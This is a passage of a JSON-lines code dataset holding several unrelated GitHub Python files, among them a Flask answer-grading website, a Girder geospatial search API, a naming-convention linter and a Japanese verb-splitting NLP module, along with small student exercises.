db.Column(db.Float())\n\n\nclass Answer(db.Model):\n answer_id = db.Column(db.Integer(), primary_key=True)\n # test_id = db.Column(db.Integer, db.ForeignKey(\n # \"test.test_id\"), primary_key=True)\n # question_id = db.Column(db.Integer, db.ForeignKey(\n # \"question.question_id\"), primary_key=True)\n student_id = db.Column(db.Integer, db.ForeignKey(\n \"student.student_id\"))\n user = db.Column(db.Text, db.ForeignKey(\"user.username\"))\n model = db.Column(db.Text())\n answer = db.Column(db.Text())\n total = db.Column(db.Float())\n marks = db.Column(db.Float())\n\n\nclass Student(db.Model):\n student_id = db.Column(db.Integer(), primary_key=True)\n name = db.Column(db.Text)\n srn = db.Column(db.Text, unique=True)\n\n# Application #\n\n@application.route(\"/index.html/\")\ndef index():\n print(\"Inside\")\n return render_template(\"index.html\")\n\n@application.route(\"/\")\ndef home():\n return redirect('/login.html/')\n\n\n@application.route('/dashboard.html/', methods=[\"GET\"])\ndef dashboard():\n return render_template(\"dashboard.html\", user=session[\"username\"])\n\n\n@application.route(\"/login.html/\", methods=[\"GET\", \"POST\"])\ndef login():\n if(request.method == \"POST\"):\n username = request.form[\"username\"]\n password = request.form[\"password\"]\n user = User.query.filter_by(username=username).first()\n if(user is None):\n flash(\"Username not available. Sign up first\", \"danger\")\n elif(user.password != password):\n flash(\"Username and password does not match.\", \"danger\")\n else:\n session[\"username\"] = user.username\n return redirect(\"/dashboard.html/\")\n\n return render_template('login.html')\n\n\n@application.route(\"/signup.html/\", methods=[\"GET\", \"POST\"])\ndef signup():\n\n if(request.method == \"POST\"):\n username = request.form[\"username\"]\n password = request.form[\"password\"]\n email = request.form[\"email\"]\n name = request.form[\"name\"]\n number = request.form[\"number\"]\n\n test = email.endswith(\"@gmail.com\") and len(\n number) == 10 and number.isdigit()\n if(not test):\n flash(\"Wrong input format\", \"danger\")\n\n user1 = User.query.filter_by(email=email).first()\n user2 = User.query.filter_by(username=username).first()\n\n if(user1 is None and user2 is None):\n user = User(email=email, username=username,\n password=password, name=name, number=number)\n db.session.add(user)\n db.session.commit()\n flash(\"User created succesfully. Login to start evaluating\", \"success\")\n return redirect(\"/login.html/\")\n else:\n flash(\"Username or email already present.\", \"danger\")\n return render_template(\"signup.html\")\n\n else:\n return render_template(\"signup.html\")\n\n\n@application.route('/test.html/')\ndef test():\n return render_template(\"test.html\", user=session[\"username\"])\n\n\n@application.route('/view_answers.html/', methods=[\"GET\"])\ndef view_answer():\n srn = request.args.get('srn')\n session[\"srn\"] = srn\n return render_template(\"view_answers.html\", user=session[\"username\"], srn=srn)\n\n\n@application.route('/get_answers/', methods=[\"GET\"])\ndef get_answer():\n srn = session[\"srn\"]\n count = int(request.args.get('count'))\n student_id = Student.query.filter_by(srn=srn).first().student_id\n answers = Answer.query.filter_by(student_id=student_id).all()\n data = []\n for answer in answers:\n data.append([answer.model, answer.answer, answer.total,\n answer.marks, answer.answer_id])\n return jsonify(data[2*count:2*count+2])\n\n\n@application.route('/update_marks/', methods=[\"POST\"])\ndef update_marks(id):\n marks = float(request.form[\"marks\"])\n answer = Answer.query.filter_by(answer_id=id).first()\n answer.marks = min(answer.total, marks)\n db.session.commit()\n return redirect(url_for(\"view_answer\", srn=session[\"srn\"]))\n\n\n@application.route('/evaluate.html/')\ndef eval():\n students = Student.query.all()\n data = []\n for student in students:\n s_id = student.student_id\n name = student.name\n srn = student.srn\n answers = Answer.query.filter_by(student_id=s_id).all()\n total_marks = 0\n marks_scored = 0\n count = 0\n for answer in answers:\n if(answer.user == session[\"username\"]):\n total_marks += answer.total\n marks_scored += answer.marks\n count += 1\n if(count):\n data.append([name, srn, len(answers), marks_scored, total_marks])\n\n return render_template(\"evaluate.html\", user=session[\"username\"], data=data)\n\n\n@application.route('/result.html/')\ndef result():\n return render_template(\"result.html\", user=session[\"username\"])\n\n\n@application.route('/get_students', methods=[\"GET\"])\ndef get_students():\n term = request.args.get('term').lower()\n students = Student.query.all()\n data = []\n for student in students:\n s_id = student.student_id\n name = student.name\n srn = student.srn\n if(name.lower().startswith(term)):\n answers = Answer.query.filter_by(student_id=s_id).all()\n total_marks = 0\n marks_scored = 0\n count = 0\n for answer in answers:\n if(answer.user == session[\"username\"]):\n total_marks += answer.total\n marks_scored += answer.marks\n count += 1\n if(count):\n data.append([name, srn, marks_scored, total_marks])\n\n return jsonify(data), 200\n\n\n@application.route('/get_results', methods=[\"GET\"])\ndef get_result():\n count = int(request.args.get('count'))\n students = Student.query.all()\n data = []\n for student in students:\n s_id = student.student_id\n name = student.name\n srn = student.srn\n answers = Answer.query.filter_by(student_id=s_id).all()\n total_marks = 0\n marks_scored = 0\n answer_count = 0\n for answer in answers:\n if(answer.user == session[\"username\"]):\n total_marks += answer.total\n marks_scored += answer.marks\n answer_count += 1\n if(answer_count):\n data.append([name, srn, marks_scored, total_marks])\n\n return jsonify(data[2*count: 2*count+2]), 200\n\n\n@application.route('/add.html/', methods=[\"GET\", \"POST\"])\ndef add():\n if(request.method == \"POST\"):\n name = request.form[\"name\"]\n srn = request.form[\"srn\"]\n total = int(request.form[\"marks\"])\n model = request.form[\"model\"]\n answer = request.form[\"answer\"]\n user = session[\"username\"]\n\n print(\"Ola\", name, srn)\n\n student = Student.query.filter_by(name=name, srn=srn).first()\n if(student is None):\n student = Student(name=name, srn=srn)\n db.session.add(student)\n db.session.commit()\n\n student_id = Student.query.filter_by(\n name=name, srn=srn).first().student_id\n marks = evalulate_answer(model, answer)*total\n\n answer = Answer(student_id=student_id, total=total,\n marks=marks, model=model, answer=answer, user=user)\n db.session.add(answer)\n db.session.commit()\n\n return render_template(\"add.html\", user=session[\"username\"])\n\n\n@application.route('/logout/')\ndef logout():\n session.pop(\"username\")\n return redirect(\"/login.html/\")\n\n\ndef evalulate_answer(model, answer):\n alpha = 0.3\n beta = 0.25\n pattern_score = Ngrams(model)*Ngrams(answer)\n common_score = common(model, answer)\n print(\"Scores: \", pattern_score, common_score)\n if(pattern_score == 0 or common_score == 0):\n return 0\n\n return round(min(1, alpha*pattern_score+(1-alpha)*common_score+beta), 2)\n\n\nif __name__ == \"__main__\":\n db.create_all()\n application.run()\n","repo_name":"rananth99/Automatic-Answer-Evaluation-Website","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":9220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18298836105","text":"#central-native Module 2 Project\r\n\"\"\"Values to calculate central tendancy \"\"\"\r\n\r\n#Initialization phase\r\ntotal = 0 # sum of values\r\nvalue_counter = 0 \r\nvalues = [47, 95, 88, 73, 88, 84] # list of values\r\n\r\n#processing phase\r\nfor value in values:\r\n total += value #add current value to running total\r\n value_counter += 1 #indicate one more value processed\r\n\r\n#termination phase\r\naverage = total / value_counter\r\nprint(f'The values mean is {average:.2f}')\r\nprint(f'The sum of the values is {total}')\r\nprint(f'The count of values is {value_counter}')\r\nprint(f'The median of the values is {value}')\r\n#to get mode had to do this\r\nvalues = [47, 95, 88, 73, 88, 84]\r\noccurrences = []\r\nfor item in values :\r\n count = 0\r\n for x in values :\r\n if x == item :\r\n count += 1\r\n occurrences.append(count)\r\n\r\nduplicates = set()\r\nindex = 0\r\nwhile index < len(values) :\r\n if occurrences[index] != 1 :\r\n duplicates.add(values[index])\r\n index += 1\r\n\r\nprint(f'The Mode value is {duplicates}')","repo_name":"jcreech72/608-mod2","sub_path":"central-native.py","file_name":"central-native.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11990436568","text":"from tempfile import NamedTemporaryFile\nimport pkg_resources\nimport inspect\nfrom girder.api import access\nfrom girder.api.describe import autoDescribeRoute, describeRoute, Description\nfrom girder.api.rest import boundHandler, filtermodel\nfrom girder.exceptions import ValidationException, FilePathException\nfrom girder.models.item import Item\nfrom girder.models.file import File\nfrom girder.constants import AccessType\nfrom girder.utility._cache import cache\nfrom geometa.schema import OpenSearchGeoSchema, BaseSchema\nfrom .constants import (\n GEOSPATIAL_FIELD,\n GEOSPATIAL_SUBDATASETS_FIELD,\n GEOMETA_FIELD\n)\nfrom .exceptions import CannotHandleError\nfrom marshmallow import ValidationError\n\n\ndef _find(user, query):\n cursor = Item().find(query)\n\n return list(Item().filterResultsByPermission(\n cursor, user, AccessType.READ))\n\n\ndef get_documents_by_geometry(user, geometry, relation):\n query = {\n '$or': [\n {\n GEOSPATIAL_FIELD: {\n relation: {\n '$geometry': geometry\n }\n }\n },\n {\n GEOSPATIAL_SUBDATASETS_FIELD: {\n relation: {\n '$geometry': geometry\n }\n }\n }\n ]\n\n }\n return _find(user, query)\n\n\ndef get_documents_by_radius(user, latitude, longitude, radius):\n RADIUS_OF_EARTH = 6378137.0 # average in meters\n query = {\n GEOSPATIAL_FIELD: {\n '$geoWithin': {'$centerSphere': [\n [longitude, latitude],\n radius / RADIUS_OF_EARTH]}\n }\n }\n\n return _find(user, query)\n\n\ndef _get_geometa(girder_item, girder_file, path):\n metadata = {}\n for entry_point_name, [handler, args] in get_type_handlers().items():\n kwargs = {}\n if 'girder_item' in args:\n kwargs['girder_item'] = girder_item\n if 'girder_file' in args:\n kwargs['girder_file'] = girder_file\n try:\n metadata = handler(path, **kwargs)\n except CannotHandleError:\n pass\n\n return metadata\n\n\ndef _get_geometa_from_filesystem(girder_item, girder_file):\n path = File().getLocalFilePath(girder_file)\n return _get_geometa(girder_item, girder_file, path)\n\n\ndef _get_geometa_from_remote_assetstore(girder_item, girder_file):\n with NamedTemporaryFile() as f:\n for data in File().download(girder_file, headers=False)():\n f.write(data)\n return _get_geometa(girder_item, girder_file, f.name)\n\n\n@cache.cache_on_arguments()\ndef get_type_handlers():\n entry_points = pkg_resources.iter_entry_points('geometa.types')\n return {e.name: [e.load(), inspect.getargspec(e.load()).args]\n for e in entry_points}\n\n\ndef get_geometa(girder_item, girder_file):\n try:\n return _get_geometa_from_filesystem(girder_item, girder_file)\n except FilePathException:\n return _get_geometa_from_remote_assetstore(girder_item, girder_file)\n\n\ndef create_geometa(girder_item, girder_file, metadata=None):\n if not metadata:\n metadata = get_geometa(girder_item, girder_file)\n\n if metadata:\n schema = BaseSchema()\n schema.load(metadata)\n girder_item[GEOMETA_FIELD] = metadata\n Item().save(girder_item)\n Item().collection.create_index([(GEOSPATIAL_FIELD, \"2dsphere\")])\n return girder_item\n else:\n return None\n\n\n@access.public\n@boundHandler\n@autoDescribeRoute(\n Description('Get geospatial metadata for a given item')\n .modelParam('id', 'The ID of the item that will have geospatial metadata.',\n model=Item, level=AccessType.READ)\n)\ndef geometa_get_handler(self, item):\n girder_file = [i for i in Item().childFiles(item, limit=1)][0]\n try:\n return item[GEOMETA_FIELD]\n except KeyError:\n return get_geometa(item, girder_file)\n\n\n@access.public\n@filtermodel(model=Item)\n@boundHandler\n@autoDescribeRoute(\n Description('Set geospatial metadata for a given item')\n .modelParam('id', 'The ID of the item that will have geospatial metadata.',\n model=Item, level=AccessType.READ)\n .jsonParam('geometa', 'Json object to save as geospatial metadata',\n required=False, default=None, requireObject=True)\n)\ndef geometa_create_handler(self, item, geometa):\n girder_file = None\n if not geometa:\n girder_file = [i for i in Item().childFiles(item, limit=1)][0]\n try:\n return create_geometa(item, girder_file, geometa)\n except ValidationError as e:\n raise ValidationException(e.messages)\n\n\n@access.public\n@boundHandler\n@describeRoute(\n Description('Query for the items that matches a given geospatial criteria')\n .param('latitude', 'Latitude of the search point', required=False)\n .param('longitude', 'Longitude of the search point', required=False)\n .param('radius', 'Radius of the search circle', required=False)\n .param('relation', 'Relation parameter for the query', required=False)\n .param('bbox', 'Bounding box parameter', required=False)\n .param('geometry', 'Geojson geometry for the query in wkt format',\n required=False)\n .param('geojson', 'Geojson geometry for the query', required=False)\n)\ndef geometa_search_handler(self, params):\n schema = OpenSearchGeoSchema()\n user = self.getCurrentUser()\n try:\n params = schema.load(params)\n except ValidationError as e:\n raise ValidationException(e.messages)\n user = self.getCurrentUser()\n documents = {}\n\n if 'geometry' in params:\n documents = get_documents_by_geometry(user,\n params['geometry'],\n params['relation'])\n elif 'bbox' in params:\n documents = get_documents_by_geometry(user,\n params['bbox'],\n params['relation'])\n elif 'latitude' in params:\n documents = get_documents_by_radius(user,\n params['latitude'],\n params['longitude'],\n params['radius'])\n elif 'geojson' in params:\n documents = get_documents_by_geometry(user,\n params['geojson'],\n params['relation'])\n\n return documents\n","repo_name":"OpenGeoscience/girder_geospatial","sub_path":"geometa/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":6505,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"74140651947","text":"\"\"\"emdMain.py : main do projeto\n\n__author__ : grupo 04\n__version__ : 1.0\n__credits__ : [Diogo Araújo, Diogo Rebelo, Joel Araújo]\n\"\"\"\n\nfrom EMDsParser import *\nfrom Queries import *\nfrom htmlGenerator import *\n\n## load data from csv file\nemdDS = loadDataStructure.buildData(\"dataset/emd.csv\")\n\n## dates\ndatesIndicators.datesIndicatorsHtml(\"html/datesIndicators.html\", emdDS[0])\ndateStudy.datesGraph(emdDS[0])\n\n## age&Gender\nageGenderDetails = genderAgeQueries.getGenderDetails(emdDS[0])\nageGenderSorted = ageGenderDetails[1]\ngenderDetais = genderAgeQueries.calculateGenderDetails(ageGenderDetails)\ngenderAgeQueries.genderAge_Graph(ageGenderDetails)\ngenderAgeQueries.allYearsPieGraph(genderDetais)\ngenderAgeQueries.createBarGraphGender(genderDetais)\nageGenderIndicators.ageGenderIndicatorsHtml(\"html/ageGenderIndicators.html\", ageGenderSorted)\n\n## age\ngenderIndicators.genderIndicatorsHTML(\"html/genderIndicators.html\", emdDS[0])\n\n## address\naddresses = addresStudy.getAddress(emdDS[0])\naddressIndicators.addressIndicatorsHtml(\"html/addressIndicators.html\", addresses)\naddresStudy.createBarGraphAdress(addresses)\n\n## federated and med results\nfitAndfed = fitFederated.findAptosDic(emdDS[0])\nfitFederated.createBarGraphAptos(fitAndfed)\nfitFederated.createBarGraphFed(fitAndfed)\n\n## modality\nmodalities = modalityStudy.getModalities(emdDS[0])\nmodalitiesInfo = modalityStudy.calculateModalitiesInfo(modalities)\nmodalityIndicators.modalityIndicatorsHtml(\"html/modalityIndicators.html\", modalities)\nmodalityStudy.modalidades_Graph(modalitiesInfo)\nmodalityStudy.mod_graph_AllYears(modalitiesInfo[0])\n\nfedIndicators.federatedIndicatorsHTML(\"html/federatedIndicators.html\", fitAndfed)\nmedResultsIndicators.medResultsIndicatorsHtml(\"html/medicalResultsIndicators.html\", fitAndfed)\n\nindex.indexHTML(emdDS)","repo_name":"DMdSA/PL-Projetos","sub_path":"TP01/src/emdMain.py","file_name":"emdMain.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17256197552","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\n\nimport torch\n\n\ndef mask_fill(\n fill_value: float,\n tokens: torch.tensor,\n embeddings: torch.tensor,\n padding_index: int,\n) -> torch.tensor:\n \"\"\"\n Function that masks embeddings representing padded elements.\n :param fill_value: the value to fill the embeddings belonging to padded tokens.\n :param tokens: The input sequences [bsz x seq_len].\n :param embeddings: word embeddings [bsz x seq_len x hiddens].\n :param padding_index: Index of the padding token.\n \"\"\"\n padding_mask = tokens.eq(padding_index).unsqueeze(-1)\n return embeddings.float().masked_fill_(padding_mask, fill_value).type_as(embeddings)\n","repo_name":"ricardorei/lightning-text-classification","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":202,"dataset":"github-code","pt":"37"} +{"seq_id":"13618569732","text":"from collections import deque\n\nMAX_INT = 1000 * 1000 + 1\nN, M = tuple(map(int, input().split()))\ngrid = [list(map(int, list(input()))) for _ in range(N)]\ndist = [[[-1] * 2 for _ in range(M)] for _ in range(N)]\n\n\ndef in_range(r, c):\n return 0 <= r < N and 0 <= c < M\n\n\ndef can_go_wall(r, c, count):\n return in_range(r, c) and count == 0 and grid[r][c] == 1 and dist[r][c][count + 1] == -1\n\n\ndef can_go_blank(r, c, count):\n return in_range(r, c) and grid[r][c] == 0 and dist[r][c][count] == -1\n\n\ndef bfs(sy, sx):\n dys, dxs = [-1, 1, 0, 0], [0, 0, -1, 1]\n\n queue = deque()\n queue.append((sy, sx, 0))\n dist[sy][sx][0] = 1\n\n while queue:\n y, x, count = queue.popleft()\n for i in range(4):\n ny, nx = y + dys[i], x + dxs[i]\n # 벽이 없다면\n if can_go_blank(ny, nx, count):\n dist[ny][nx][count] = dist[y][x][count] + 1\n queue.append((ny, nx, count))\n # 벽이 있다면\n if can_go_wall(ny, nx, count):\n dist[ny][nx][count + 1] = dist[y][x][count] + 1\n queue.append((ny, nx, count + 1))\n\n\nbfs(0, 0)\n\nif dist[N - 1][M - 1][0] == -1:\n dist[N - 1][M - 1][0] = MAX_INT\nif dist[N - 1][M - 1][1] == -1:\n dist[N - 1][M - 1][1] = MAX_INT\nanswer = min(dist[N - 1][M - 1])\n\nif answer == MAX_INT:\n print(-1)\nelse:\n print(answer)\n\n'''\n6 4\n0100\n1110\n1000\n0000\n0111\n0000\n'''\n","repo_name":"hyeyoungs/ProblemSolving","sub_path":"Graph/Baek_2206.py","file_name":"Baek_2206.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36380564256","text":"\"\"\"Naming analyser, checks everything name related\"\"\"\nimport re\nfrom astroid import AssignName, AssignAttr, For, Call, FunctionDef\n\nfrom .analyser import Analyser, register_check\n\n\nclass NamingAnalyser(Analyser):\n \"\"\"Analyse good naming\"\"\"\n SNAKE_CASE = re.compile(r\"[a-z_][a-z0-9_]{0,30}$\")\n CONSTANT_SNAKE_CASE = re.compile(r\"(([A-Z_][A-Z0-9_]*)|(__.*__))$\")\n HUNGARIAN_NOTATION = re.compile(r\"(?= 3:\n continue\n\n results.append((filename, node.lineno, node.name,\n node.parent.as_string().splitlines()[0]))\n return results\n\n @register_check(error_format=\"{}:{}: Hungarian notation variable '{}':\\n\"\n \"\\t{}\")\n def check_hungarian_notation_variable(self):\n \"\"\"Checks for variable names with hungarian notation \"\"\"\n results: list[tuple[str, int, str, str]] = []\n for filename, attr in self._sources.items():\n for node in attr.tree.pre_order():\n if not isinstance(node, AssignName):\n continue\n if not self.HUNGARIAN_NOTATION.search(node.name):\n continue\n results.append((filename, node.lineno, node.name,\n node.parent.as_string().splitlines()[0]))\n return results\n\n @register_check(error_format=\"{}:{}: Hungarian notation attribute '{}':\\n\"\n \"\\t{}\")\n def check_hungarian_notation_attribute(self):\n \"\"\"Checks for attribute names with hungarian notation \"\"\"\n results: list[tuple[str, int, str, str]] = []\n for filename, attr in self._sources.items():\n for node in attr.tree.pre_order():\n if not isinstance(node, AssignAttr):\n continue\n if not self.HUNGARIAN_NOTATION.search(node.attrname):\n continue\n results.append((filename, node.lineno, node.attrname,\n node.parent.as_string().splitlines()[0]))\n return results\n\n @register_check(error_format=\"{}:{}: Hungarian notation in function/method \"\n \"name '{}':\\n\\t{}\")\n def check_hungarian_notation_method(self):\n \"\"\"Checks for hungarian notation function and method naming \"\"\"\n results: list[tuple[str, int, str, str]] = []\n for filename, attr in self._sources.items():\n for node in attr.tree.pre_order():\n if not isinstance(node, FunctionDef):\n continue\n if not self.HUNGARIAN_NOTATION.search(node.name):\n continue\n results.append((filename, node.lineno, node.name,\n node.as_string().strip().splitlines()[0]))\n return results\n\n @register_check(\"{}:{}: Variables defined at global scope should be \"\n \"treated as constants:\\n\\t{}\")\n def check_constant_naming(self):\n \"\"\"Checks if constants are named in UPPER_SNAKE_CASE\"\"\"\n # lineno, line\n results: list[tuple[str, int, str]] = []\n for filename, attr in self._sources.items():\n for node in attr.tree.get_root().get_children():\n if not isinstance(node, AssignName):\n continue\n if not self.CONSTANT_SNAKE_CASE.fullmatch(node.name):\n continue\n results.append((filename, node.lineno, node.as_string()))\n return results\n\n @staticmethod\n def _is_for_range_variable(node: AssignName):\n \"\"\"Check if the assignment is for a variable for a for range loop \"\"\"\n parent = node.parent\n if not isinstance(parent, For):\n return False\n iter_on = parent.iter\n if not isinstance(iter_on, Call):\n return False\n return iter_on.func.as_string() == \"range\"\n","repo_name":"mike-fam/mikelint","sub_path":"mikelint/analysers/naming.py","file_name":"naming.py","file_ext":"py","file_size_in_byte":7079,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"17303743309","text":"import csv\n\n\ndef get_books(with_name: str):\n books = []\n with open('books.csv', 'r', encoding='utf-8') as file:\n reader = csv.reader(file, delimiter='|')\n for row in reader:\n if with_name.lower() in row[1].lower():\n books.append(row)\n\n return books\n\n\ndef get_totals(books):\n books_info = []\n\n for book_values in books:\n try:\n quantity_price = float(book_values[3]) * float(book_values[4])\n if quantity_price < 500:\n quantity_price += 100\n\n books_info.append((book_values[0], str(quantity_price)))\n except ValueError:\n print(f'Incorrect values in book ({book_values})')\n\n return books_info\n\n\nbooks = get_books('python')\nprint(books)\n\nbooks_info = get_totals(books)\nprint(books_info)\n","repo_name":"Gerkul/University","sub_path":"Python/practice7/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24294682176","text":"from chunker import ChunkExtractor\nfrom sub_verb_dic import SubVerbDic\nfrom case_information_get import CaseExtractor\nfrom special_verb_dic import SpecialVerb\nimport re\n\nclass VerbSpliter:\n\n def __init__(self):\n \"\"\"\n 関数`__init__`はクラスをインスタンス化した時に実行されます。\n \"\"\"\n chunker = ChunkExtractor()\n self.connect_word = chunker.connect_word\n self.num_chunk = chunker.num_chunk\n self.verb_chunk = chunker.verb_chunk\n self.compaound = chunker.compaound\n c_g = CaseExtractor()\n self.case_get = c_g.case_get\n s_v = SpecialVerb()\n self.campany_special_verb = s_v.campany_special_verb\n\n\n \"\"\"\n 項を分割しない格\n \"\"\"\n not_devide_case_dic = [\"により\", \"などに\", \"へ\", \"から\", \"には\"]\n\n\n \"\"\"\n 補助動詞かどうかの判別\n \"\"\"\n def sub_verb_chek(self, check_w, verb, *doc):\n s_v_dic = SubVerbDic()\n check_word = check_w\n if check_word[-2:] == 'する' and check_word != 'する':\n check_word = check_word[:-2]\n if check_word[-4:] == '(する)' and check_word != '(する)':\n check_word = check_word[:-4]\n if check_word[-3:] == '(だ)' and check_word != '(だ)':\n check_word = check_word[:-3]\n if check_word[-4:] == '(です)' and check_word != '(です)':\n check_word = check_word[:-4]\n if check_word[-2:] == 'こと' and check_word != 'こと':\n check_word = doc[verb[\"lemma_start\"]].lemma_\n if check_word in s_v_dic.sub_verb_dic:\n return True\n return False\n\n\n \"\"\"\n 述部に対するobjを探索\n \"\"\"\n def object_serch(self, start, *doc):\n for token in doc:\n if token.head.i == start and token.dep_ == 'obj':\n self.num_chunk(token.i, *doc)\n return ''\n\n \"\"\"\n カタカナ動詞の複合語のチェック\n \"\"\"\n def all_katakana(self, word1, word2):\n re_katakana = re.compile(r'[\\u30A1-\\u30F4ー]+')\n if re_katakana.fullmatch(word1) and re_katakana.fullmatch(word2):\n return True\n return False\n\n\n\n \"\"\"\n 目的語の中の述部を分割\n\n ret : 目的語 + 主述部 + 主述始点 + 主述部終点\n \"\"\"\n def object_devide(self, start, end, case, argument, predicate, *doc):\n compound_word = ['商品', '技術', '製品', '無料', '限定', '特別', '本格', '社会', '新', '国内', '顧客', '一般', '全国', '早期', '事前'] # 複合動を作っても良い普通名詞\n\n if start == end and \"連体修飾\" not in case:\n if (doc[start - 1].lemma_ == 'と' or doc[start - 1].lemma_ == 'や') and self.case_get(start, *doc) == 'を':\n return {'object': '', 'verb': self.compaound(start, end, *doc) + 'する', 'verb_start': start, 'verb_end': end}\n else:\n return {'object': self.compaound(start, end, *doc), 'verb': '', 'verb_start': -1, 'verb_end': -1}\n for i in reversed(range(start, end + 1)):\n if doc[i].pos_ == 'PUNCT' and i != end:\n break\n if doc[i].lemma_ == 'の' and doc[i].pos_ == 'ADP' and doc[i - 1].tag_ != '形状詞-一般' and doc[i - 1].lemma_ != 'へ' and doc[i - 1].lemma_ != 'と' and doc[i - 1].lemma_ != 'で' and len(doc) > i + 1 and doc[i + 1].pos_ != 'ADJ' and len(doc) > end + 1 and doc[end + 1].lemma_ != 'で': # の で分割。 への は例外\n if i == start:\n break\n if \"省\" == doc[i - 1].lemma_[-1:] or \"庁\" == doc[i - 1].lemma_[-1:] or \"政府\" == doc[i - 1].lemma_[-2:]:\n break\n if doc[end].tag_ == '名詞-普通名詞-サ変可能' and i + 4 >= end: # 述部の複合語を4語まで許す\n if doc[end - 1].pos_ == 'NOUN' and doc[end - 1].tag_ != '名詞-普通名詞-サ変可能' and doc[end - 1].lemma_ not in compound_word and not self.all_katakana(doc[end - 1].lemma_, doc[end].lemma_):\n break\n return {'object': self.compaound(start, i - 1, *doc), 'verb': self.compaound(i + 1, end, *doc) + 'する', 'verb_start': i + 1, 'verb_end': end, \"case\": \"の\"}\n elif doc[end].tag_ == '補助記号-括弧閉' and doc[end - 1].tag_ == '名詞-普通名詞-サ変可能' and i + 4 >= end: # 述部の複合語を4語まで許す カッコ付きの目的語\n if doc[end - 2].pos_ == 'NOUN' and doc[end - 2].tag_ != '名詞-普通名詞-サ変可能' and doc[end - 2].lemma_ not in compound_word and not self.all_katakana(doc[end - 2].lemma_, doc[end - 1].lemma_):\n break\n return {'object': self.compaound(start, i - 1, *doc) + doc[end].orth_, 'verb': self.compaound(i + 1, end - 1, *doc) + 'する', 'verb_start': i + 1, 'verb_end': end - 1, \"case\": \"の\"}\n elif doc[i].lemma_ == 'こと' and len(doc) > i + 1 and (doc[i + 1].lemma_ == 'の' or doc[i + 1].lemma_ == 'を' or doc[i + 1].lemma_ == 'が'): # 〇〇することの発表を+行う\n not_special = False\n for c_pt in reversed(range(0, i - 1)):\n if doc[c_pt].head.i == i:\n if (doc[c_pt].lemma_ == '導入' or doc[c_pt].lemma_ == '発足') and doc[c_pt - 1].lemma_ == 'が':\n not_special = True\n break\n if doc[c_pt].lemma_ not in self.campany_special_verb:\n not_special = True\n break\n if not_special: # 〜こと は企業特別述部以外は分割しない\n continue\n for predic in predicate:\n if predic[\"lemma_start\"] == start:\n for arg in argument:\n if arg[\"predicate_id\"] == predic[\"id\"] and arg[\"case\"] == \"を\":\n if doc[i - 1].lemma_ == 'する':\n return {'object': arg[\"lemma\"], 'verb': self.compaound(start, i - 2, *doc) + 'する', 'verb_start': start, 'verb_end': end - 2, 'new_object_start': arg[\"lemma_start\"], 'new_object_end': arg[\"lemma_end\"]}\n if doc[i - 2].lemma_ == 'する' and doc[i - 1].lemma_ == 'た':\n return {'object': arg[\"lemma\"], 'verb': self.compaound(start, i - 3, *doc) + 'する', 'verb_start': start, 'verb_end': end - 3, 'new_object_start': arg[\"lemma_start\"], 'new_object_end': arg[\"lemma_end\"]}\n\n if doc[start - 1].pos_ != 'ADP':\n return {'object': self.compaound(start, end, *doc), 'verb': '', 'verb_start': -1, 'verb_end': -1}\n if doc[i - 1].lemma_ == 'する':\n if doc[start - 2].tag_ == '補助記号-括弧閉' or doc[start - 2].lemma_ == '"':\n new_obj = self.num_chunk(start - 3, *doc)\n else:\n new_obj = self.num_chunk(start - 2, *doc)\n if new_obj and doc[new_obj[\"lemma_end\"] + 1].lemma_ != 'に':\n return {'object': new_obj[\"lemma\"], 'verb': self.compaound(start, i - 2, *doc) + 'する', 'verb_start': start, 'verb_end': end - 2, 'new_object_start': new_obj[\"lemma_start\"], 'new_object_end': new_obj[\"lemma_end\"]}\n else:\n return {'object': '', 'verb': self.compaound(start, i - 2, *doc) + 'する','verb_start': start, 'verb_end': end - 2}\n if doc[i - 2].lemma_ == 'する' and doc[i - 1].lemma_ == 'た':\n if doc[start - 2].tag_ == '補助記号-括弧閉':\n new_obj = self.num_chunk(start - 3, *doc)\n else:\n new_obj = self.num_chunk(start - 2, *doc)\n if new_obj:\n return {'object': new_obj[\"lemma\"], 'verb': self.compaound(start, i - 3, *doc) + 'する','verb_start': start, 'verb_end': end - 3, 'new_object_start': new_obj[\"lemma_start\"], 'new_object_end': new_obj[\"lemma_end\"]}\n else:\n return {'object': '', 'verb': self.compaound(start, i - 3, *doc) + 'する','verb_start': start, 'verb_end': end - 3}\n if doc[i - 1].pos_ == 'VERB': # 動詞 + こと + (を、の、が)\n new_verb = self.verb_chunk(start, *doc)\n adp_pt = -1\n for adp_pt in reversed(range(0, new_verb[\"lemma_start\"] - 1)): # 助詞を挟んだ自立語を探す\n if doc[adp_pt].pos_ != 'ADP':\n break\n new_obj = self.num_chunk(adp_pt, *doc)\n if new_obj:\n return {'object': new_obj[\"lemma\"], 'verb': new_verb[\"lemma\"], 'verb_start': new_verb[\"lemma_start\"], 'verb_end': new_verb[\"lemma_end\"], 'new_object_start': new_obj[\"lemma_start\"], 'new_object_end': new_obj[\"lemma_end\"]}\n else:\n return {'object': '', 'verb': new_verb[\"lemma\"], 'verb_start': new_verb[\"lemma_start\"], 'verb_end': new_verb[\"lemma_end\"]}\n p_id = -1\n rentai_f = False\n for c_arg in argument:\n if start >= c_arg[\"lemma_start\"] and start <= c_arg[\"lemma_end\"]:\n p_id = c_arg[\"predicate_id\"]\n break\n for c_arg in argument:\n if c_arg[\"predicate_id\"] == p_id and \"連体修飾\" in c_arg[\"case\"]:\n rentai_f = True\n break\n if (\"連体修飾\" in case or ((case == \"の\" or case == \"を\") and not 